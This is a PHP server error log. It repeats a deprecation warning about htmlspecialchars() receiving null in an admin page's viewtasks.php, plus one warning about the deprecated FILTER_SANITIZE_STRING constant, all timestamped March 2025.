Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:37 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 23 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type 